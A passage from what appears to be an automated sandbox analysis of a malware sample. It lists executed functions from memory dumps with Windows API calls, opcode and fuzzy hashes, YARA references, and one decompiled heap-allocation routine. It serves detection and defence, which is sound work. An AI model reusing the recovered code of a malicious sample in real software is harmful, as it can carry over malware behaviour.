            • Instruction Fuzzy Hash: A84123B0C04659CBDB20DFA9D944BDDBBF1BF88308F20806AD448AB251D7B56945CF91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 05082470, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
            Download Yara Rule
            APIs
            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05082531
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: CallProcWindow
            • String ID:
            • API String ID: 2714655100-0
            • Opcode ID: d1aebae3609c05b2089794cd0a067d8e74bc47af4a067c36c4003580da13df47
            • Instruction ID: f887e8ba46be1a8b9372cd027f4291107b537462a391c866486c41d273f15dfe
            • Opcode Fuzzy Hash: d1aebae3609c05b2089794cd0a067d8e74bc47af4a067c36c4003580da13df47
            • Instruction Fuzzy Hash: 004118B8A003058FDB14DF99D448FAEBBF6FB88314F148459D559AB321D774A845CFA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0508B889, Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON
            Download Yara Rule
            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0508B957
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: 1779325d57d53cdd955a2fd209b60713fc2f059295aa0c45fceaaf0b75313ccf
            • Instruction ID: f2b2a49740b4069ba12eece25963db956ceea5825df5b35cea0404ec2611f754
            • Opcode Fuzzy Hash: 1779325d57d53cdd955a2fd209b60713fc2f059295aa0c45fceaaf0b75313ccf
            • Instruction Fuzzy Hash: 23318D72904348AFDB119FA9D844BEEBFF8EF19314F08806AE594A7261C335D854DBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 05256270, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
            Download Yara Rule
            APIs
            • FindCloseChangeNotification.KERNELBASE(?), ref: 05256320
            Memory Dump Source
            • Source File: 0000000B.00000002.688683609.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
            Similarity
            • API ID: ChangeCloseFindNotification
            • String ID:
            • API String ID: 2591292051-0
            • Opcode ID: a61d4d8776b274011c9e2e0e78b566bc3ad364299a6ac8d7ce620d793b00bbd3
            • Instruction ID: df6e1071ef973fe54228b5fd1b6df07f153fb0e8b3952df57b889e13d4764199
            • Opcode Fuzzy Hash: a61d4d8776b274011c9e2e0e78b566bc3ad364299a6ac8d7ce620d793b00bbd3
            • Instruction Fuzzy Hash: DD218871914308DFCB10DF99D448B9EBBF4FF58320F54806AE958AB251C735A944CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0215BCF8, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
            Download Yara Rule
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0215BD87
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: dc75c79c176ebe7c0e00e887280c79244bdf511c88b501f888884a55ecca3b11
            • Instruction ID: ec73c391b8e79a1576bf7b8eee789b759c703c9da160555e825a38f305d005cf
            • Opcode Fuzzy Hash: dc75c79c176ebe7c0e00e887280c79244bdf511c88b501f888884a55ecca3b11
            • Instruction Fuzzy Hash: F321F2B5904218AFDB10CFA9D484BDEBBF4EB48314F14801AE918A7250C379A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0215BD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
            Download Yara Rule
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0215BD87
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 1e245e5b13363d160bfc93387cd8807a61411ff5735d0d21fdc9f7f5214743d5
            • Instruction ID: bd2045915806f956c65e5c46dd9eaed401a6e9a0e8ada6859b7406496d41ea98
            • Opcode Fuzzy Hash: 1e245e5b13363d160bfc93387cd8807a61411ff5735d0d21fdc9f7f5214743d5
            • Instruction Fuzzy Hash: B521E3B5904208DFDB10CFA9D484BDEBBF8EB48314F14841AE918A3210C379A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02157EEA, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
            Download Yara Rule
            APIs
            • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02157F5D
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: CallbackDispatcherUser
            • String ID:
            • API String ID: 2492992576-0
            • Opcode ID: 844b5c0aa8d25f9f6db6779ca938139fdb61046eea73b7257216abe0e80e0d87
            • Instruction ID: 1efed207d31ec2515d342d4fc734b407136ecfd1718277d62fcbfad1c7d9658d
            • Opcode Fuzzy Hash: 844b5c0aa8d25f9f6db6779ca938139fdb61046eea73b7257216abe0e80e0d87
            • Instruction Fuzzy Hash: A521E771944398DFDB11CF98D4453DEFFF4EB05314F44446AE494A7282C3389616CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02158768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,021596A9,00000800,00000000,00000000), ref: 021598BA
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: e2034f7cb0564909f40bcca1c5f8eba3d4391c99cf27c3c27261e6a9db31c3cf
            • Instruction ID: 36faf671d943b2e876209813dd78dd8f15d33fa2c100b39b713844cfc56d4bd3
            • Opcode Fuzzy Hash: e2034f7cb0564909f40bcca1c5f8eba3d4391c99cf27c3c27261e6a9db31c3cf
            • Instruction Fuzzy Hash: 1311F2B5904209DBDB10CF9AD444BDEFBF4AB88314F14846AE929B7600C379A945CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02159849, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,021596A9,00000800,00000000,00000000), ref: 021598BA
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 6e21a9f164f5c29561e8cb3a6f1beb92e7b4bf7a2206bee05db7f6298389791a
            • Instruction ID: cf9ecdf08743f72f2141e5359b7a3f097fc5b9755d20d26fc13b7c35705ef8cd
            • Opcode Fuzzy Hash: 6e21a9f164f5c29561e8cb3a6f1beb92e7b4bf7a2206bee05db7f6298389791a
            • Instruction Fuzzy Hash: B11114B6D04209CFDB10CF99D444BDEFBF5AB88314F14852AE829A7600C379A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0508B8E8, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
            Download Yara Rule
            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0508B957
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: e3af79666ba6f42b11dc9d3cbda948d841a24c0029ebf62fb084e320b31798e8
            • Instruction ID: 128c7f65af82056a028799f3b6e1a34458b392e41da0b46a9b7e1608388b66c7
            • Opcode Fuzzy Hash: e3af79666ba6f42b11dc9d3cbda948d841a24c0029ebf62fb084e320b31798e8
            • Instruction Fuzzy Hash: F91149B1804249DFDB10CFA9D844BDEBFF8EF48310F14841AE964A7210C375A954CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050832D8, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,021253E8,00000000,?), ref: 0508E73D
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 5b68427ec37f080e4723da06e51038dd5eae47f43121850e3f47e8fe003b9bbc
            • Instruction ID: 484d7cf5f8cb8cfc885ede183b23dce1029f7a969c1a98856d3eb3bd368f8398
            • Opcode Fuzzy Hash: 5b68427ec37f080e4723da06e51038dd5eae47f43121850e3f47e8fe003b9bbc
            • Instruction Fuzzy Hash: ED1125B58043499FDB10DF99D885BEEFBF8FB48324F10842AE954A3240D378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0508E6D8, Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,021253E8,00000000,?), ref: 0508E73D
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: d673a1e6fee57aa4f1de73ce4c1142173e40bd102f2b17c7a254dec063d87631
            • Instruction ID: 49b95961428ec0494843f0e68576d77097a54b00511a5a5e5a7620efb182d7f3
            • Opcode Fuzzy Hash: d673a1e6fee57aa4f1de73ce4c1142173e40bd102f2b17c7a254dec063d87631
            • Instruction Fuzzy Hash: FD1113B58002099FDB10CF99D885BEEBBF8FB48324F10842AE954A7240D379A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0215FE38, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
            Download Yara Rule
            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 0215FE9D
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: 4d74b51ea0e08b147431692e8fd8f924252e1d0f85e8d01dabeba5d83774a685
            • Instruction ID: 83066601a8358e77f92122a109c3b1135b7d9285e549e440df8381c954985b87
            • Opcode Fuzzy Hash: 4d74b51ea0e08b147431692e8fd8f924252e1d0f85e8d01dabeba5d83774a685
            • Instruction Fuzzy Hash: 2E1136B5900208DFDB10CF99D585BDEFBF4EB48314F20855AD869A7741C374A941CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0508A548, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000), ref: 0508BCBD
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 853f0cae1ccf9b0519362dae06b47deb47b9892eaecf22d79ed8b03125aad755
            • Instruction ID: fee76f4439cccd2092e8e2a853a6eac626555898e450c7188469c497c36202e6
            • Opcode Fuzzy Hash: 853f0cae1ccf9b0519362dae06b47deb47b9892eaecf22d79ed8b03125aad755
            • Instruction Fuzzy Hash: F311F2B5904348DFDB10DF99D489BEEBBF8FB48324F10842AE955A7200C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 05081540, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,0508226A,?,00000000,?), ref: 0508C435
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: ec7e0dcc18612030b047e51dffe57e51f046b39c409ed8198ba6217bd70b0b5b
            • Instruction ID: 25e0d86dfd3ce241b3f54af17085aff5b5f6e3737db0a8b9762df970cf6f2d5a
            • Opcode Fuzzy Hash: ec7e0dcc18612030b047e51dffe57e51f046b39c409ed8198ba6217bd70b0b5b
            • Instruction Fuzzy Hash: 6211F5B58043489FDB10DF99D444BEEBBF8FB58314F10841AE955A7700C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050850D4, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00000018,00000001,?), ref: 0508D29D
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: b7de2446ca1f4e564c80ca1c1496c613c0761c5c4ab8b286c58c6bdf792f6fc5
            • Instruction ID: 1a0ef9d3ed13ec30f709eeb22e17f8bc9a80a9060180e387cb06259c5d9423ee
            • Opcode Fuzzy Hash: b7de2446ca1f4e564c80ca1c1496c613c0761c5c4ab8b286c58c6bdf792f6fc5
            • Instruction Fuzzy Hash: 5511F2B5804348DFDB10DF9AD488BEEBBF8EB58324F10851AE959A7240C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0508D238, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00000018,00000001,?), ref: 0508D29D
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 01bf07745c210987dd89a8cdf0382ede4ec13f89d87c1fb3867df30acc89f9d2
            • Instruction ID: 4cc21883bb7dd86f7fa0ca25f75aeb733cc0d7e3783fe32c86f5a3b61cbff8f5
            • Opcode Fuzzy Hash: 01bf07745c210987dd89a8cdf0382ede4ec13f89d87c1fb3867df30acc89f9d2
            • Instruction Fuzzy Hash: 4E11F2B58003489FDB10DF99D885BEEBFF8FB58320F10851AE854A7640C375AA54CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 021595C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
            Download Yara Rule
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 0215962E
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: ac8c9b215e9fa8214b0eb67803ba4542db9c55b17cfa2bdc96ede33386a62d2b
            • Instruction ID: 9b26aa2b466941aa7dca5750ca9a25564471f698b9b26eda8db24dbadc1892c0
            • Opcode Fuzzy Hash: ac8c9b215e9fa8214b0eb67803ba4542db9c55b17cfa2bdc96ede33386a62d2b
            • Instruction Fuzzy Hash: 2311E0B5D00259CFDB10CF9AD444BDEFBF4AB88214F14856AD829A7600D375A549CFA2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 052562C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
            Download Yara Rule
            APIs
            • FindCloseChangeNotification.KERNELBASE(?), ref: 05256320
            Memory Dump Source
            • Source File: 0000000B.00000002.688683609.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
            Similarity
            • API ID: ChangeCloseFindNotification
            • String ID:
            • API String ID: 2591292051-0
            • Opcode ID: 89946784d7450df5fffc2f8b7a78bc2a3763cc857690245a35fe28a7c694f94f
            • Instruction ID: eb0465c9ce51e0893ef9650b5242e3a66b3d8fcb80ef5f6f5a9c3785b6d5369d
            • Opcode Fuzzy Hash: 89946784d7450df5fffc2f8b7a78bc2a3763cc857690245a35fe28a7c694f94f
            • Instruction Fuzzy Hash: 771133B18042498FDB20CF99D444BDEBBF4EF88320F14842AD958A7240C378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0508C3D0, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,0508226A,?,00000000,?), ref: 0508C435
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 683cca019d0c8ddd151235b824207098554a708471d7e97009367af530ad1b9b
            • Instruction ID: fe749b0d9bebf17f8654192b178bfdc2d09c8100672c214c57ee03a781df9504
            • Opcode Fuzzy Hash: 683cca019d0c8ddd151235b824207098554a708471d7e97009367af530ad1b9b
            • Instruction Fuzzy Hash: 3811F2B58002489FDB10CF99D889BEEBBF8FB48324F10881AE854A7200C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0508BC59, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000), ref: 0508BCBD
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: c3c70f919d5f1d8660aba2a9fad1c1d2b797f35beecc96a7bd18cd8ebf2f380d
            • Instruction ID: 9ed5b2b4858eecaefee7d977efcc1badc89b6688ceff1b16c1ccc6bf05fd4157
            • Opcode Fuzzy Hash: c3c70f919d5f1d8660aba2a9fad1c1d2b797f35beecc96a7bd18cd8ebf2f380d
            • Instruction Fuzzy Hash: 7B11D0B58042499FDB20DF99D489BDEFBF8FB88324F14841AE959A7700C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 05250438, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000000B.00000002.688683609.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
            Similarity
            • API ID: DispatchMessage
            • String ID:
            • API String ID: 2061451462-0
            • Opcode ID: 4206869223d8645bf7b66e265e1e3a8b96d417dd083e1fefa3bc9c3c25605f5d
            • Instruction ID: bc3bed5f7ce379d377f72a87a962f862b62a77ec23075f9bb8c8d491749f8416
            • Opcode Fuzzy Hash: 4206869223d8645bf7b66e265e1e3a8b96d417dd083e1fefa3bc9c3c25605f5d
            • Instruction Fuzzy Hash: E51125B1C047498FDB10CF9AD848BDEFBF4EB48314F10852AD819A3600C378A540CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0215FE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
            Download Yara Rule
            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 0215FE9D
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: f7f9a818f7c0c3a16d55751dda50c2877c5f7d9520daaa43d3f6540cfe608e94
            • Instruction ID: d1c11fa05a0f4e81ab446ed3f5177af8b1b057746b3e3f1fa9bea4828abc8e1b
            • Opcode Fuzzy Hash: f7f9a818f7c0c3a16d55751dda50c2877c5f7d9520daaa43d3f6540cfe608e94
            • Instruction Fuzzy Hash: 661103B5900248DFDB10CF99D585BDEFBF8EB48324F20855AE818A7640C374A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 05250440, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000000B.00000002.688683609.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
            Similarity
            • API ID: DispatchMessage
            • String ID:
            • API String ID: 2061451462-0
            • Opcode ID: c01741ba34ec8da96b7a0d2a381f173ab2a78f8e250ecce2c11768e87a82404c
            • Instruction ID: f9de1e8e65fdccd087ebb4d231da0a23eb6a08b61a6d77b2151929baee3a81eb
            • Opcode Fuzzy Hash: c01741ba34ec8da96b7a0d2a381f173ab2a78f8e250ecce2c11768e87a82404c
            • Instruction Fuzzy Hash: EB11D0B5D046498FDB20CF9AD848BDEFBF4FB48324F10852AE819A7240D378A544CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 94%
            			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







            0x00403e3d
            0x00403e43
            0x00403e49
            0x00403e7b
            0x00403e80
            0x00403e86
            0x00000000
            0x00403e86
            0x00403e4d
            0x00403e4f
            0x00403e4f
            0x00403e66
            0x00403e6f
            0x00403e77
            0x00000000
            0x00000000
            0x00403e57
            0x00403e59
            0x00000000
            0x00000000
            0x00403e5c
            0x00403e61
            0x00403e62
            0x00403e64
            0x00000000
            0x00000000
            0x00403e64
            0x00000000

            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
            • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
            • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
            • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A9D5B0, Relevance: .1, Instructions: 75COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000B.00000002.684155575.0000000000A9D000.00000040.00000001.sdmp, Offset: 00A9D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 16e28aa4d9dd8db784a71409ab7287830929c1941d2818788106ccaba7ebdfe5
            • Instruction ID: 5383cb79cd8c1974534ede7c2307d295362694da7846ae2c5047195f56286932
            • Opcode Fuzzy Hash: 16e28aa4d9dd8db784a71409ab7287830929c1941d2818788106ccaba7ebdfe5
            • Instruction Fuzzy Hash: 152100B1608240DFDF00DF50D8C0F26BFA5FB98324F248569EA094B206C336D896CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00AAD01C, Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000B.00000002.684191976.0000000000AAD000.00000040.00000001.sdmp, Offset: 00AAD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 622c382539802749687551b829eb44d705b5aab5d9249f2014dd4586035a5851
            • Instruction ID: e54c602ddddb8bec9ca326b7cfc3ff45f226386a20db8993e9f9344098d09282
            • Opcode Fuzzy Hash: 622c382539802749687551b829eb44d705b5aab5d9249f2014dd4586035a5851
            • Instruction Fuzzy Hash: C021F2B0608240DFDB14CF20D8C0B26BBA5FB89314F24C969D98B4B686C33AD807CA61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00AAD1D4, Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000B.00000002.684191976.0000000000AAD000.00000040.00000001.sdmp, Offset: 00AAD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a29e665a889feca7d14087a73ea541ea31fe8984062f08220b93ec8c9ff693fe
            • Instruction ID: 4fd7e4588317b398e735e4b4e439399403fd695d0e0054e579421127606e5a0a
            • Opcode Fuzzy Hash: a29e665a889feca7d14087a73ea541ea31fe8984062f08220b93ec8c9ff693fe
            • Instruction Fuzzy Hash: 1D2107B0604240EFDB01CF50D5C0F66BBA5FB85314F24CA6DD98A4B696C336D80ACB61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A9D5AB, Relevance: .1, Instructions: 56COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000B.00000002.684155575.0000000000A9D000.00000040.00000001.sdmp, Offset: 00A9D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction ID: 597bd0a1cb3c8787075cd1b7d0fc5fbf6525ec6edaa5e8d5cd9b42079994ede6
            • Opcode Fuzzy Hash: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction Fuzzy Hash: F7119376504280DFCF15CF10D5C4B16BFB1FB94324F24C6A9D9494B656C336D896CBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00AAD1CF, Relevance: .1, Instructions: 53COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000B.00000002.684191976.0000000000AAD000.00000040.00000001.sdmp, Offset: 00AAD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction ID: 417162c00a896d0d82f0e95d502c07a8f4b975dc75b016a89a7f01e1e0f84acd
            • Opcode Fuzzy Hash: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction Fuzzy Hash: E0119D75904280DFCB11CF10D5C4B55FBB1FB85324F24C6AED88A4B696C33AD85ACB62
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00AAD017, Relevance: .1, Instructions: 53COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000B.00000002.684191976.0000000000AAD000.00000040.00000001.sdmp, Offset: 00AAD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction ID: 621f1f965b426ed7713b7a2d307738711cdb263ee03d18cfb52ac0242dc5d75f
            • Opcode Fuzzy Hash: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction Fuzzy Hash: 11119075504280DFCB11CF14D5C4B15FB71FB45314F24C6AED84A4B696C33AD85ACB62
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A9D01D, Relevance: .0, Instructions: 45COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000B.00000002.684155575.0000000000A9D000.00000040.00000001.sdmp, Offset: 00A9D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ae758954450c6ba54caf70d1419017dd78288ebe8008ff63443bdb988b4b1cbf
            • Instruction ID: f9131fb608013a3b1a5300790ea567ee1f90ac9dd4cc200182291e6e72448320
            • Opcode Fuzzy Hash: ae758954450c6ba54caf70d1419017dd78288ebe8008ff63443bdb988b4b1cbf
            • Instruction Fuzzy Hash: 5A01A77160C3449AEF104B25CC84BA6FBD8EF51364F18C55AED4A5B246C3799885C6B1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A9D006, Relevance: .0, Instructions: 43COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000B.00000002.684155575.0000000000A9D000.00000040.00000001.sdmp, Offset: 00A9D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a08329857342744dd3bb11c8e75215d5d1ee61c843be6f2a2cfa8105a5b9c643
            • Instruction ID: b5a3e22cd85840dafe15c1bbd76a6cff9eac4357f3cf38be566d1dad7cb2b2c4
            • Opcode Fuzzy Hash: a08329857342744dd3bb11c8e75215d5d1ee61c843be6f2a2cfa8105a5b9c643
            • Instruction Fuzzy Hash: FE01716150D3C05FE7128B258C94B52BFB8EF53224F1980DBD9889F297C2699848C772
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
            Download Yara Rule
            C-Code - Quality: 70%
            			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
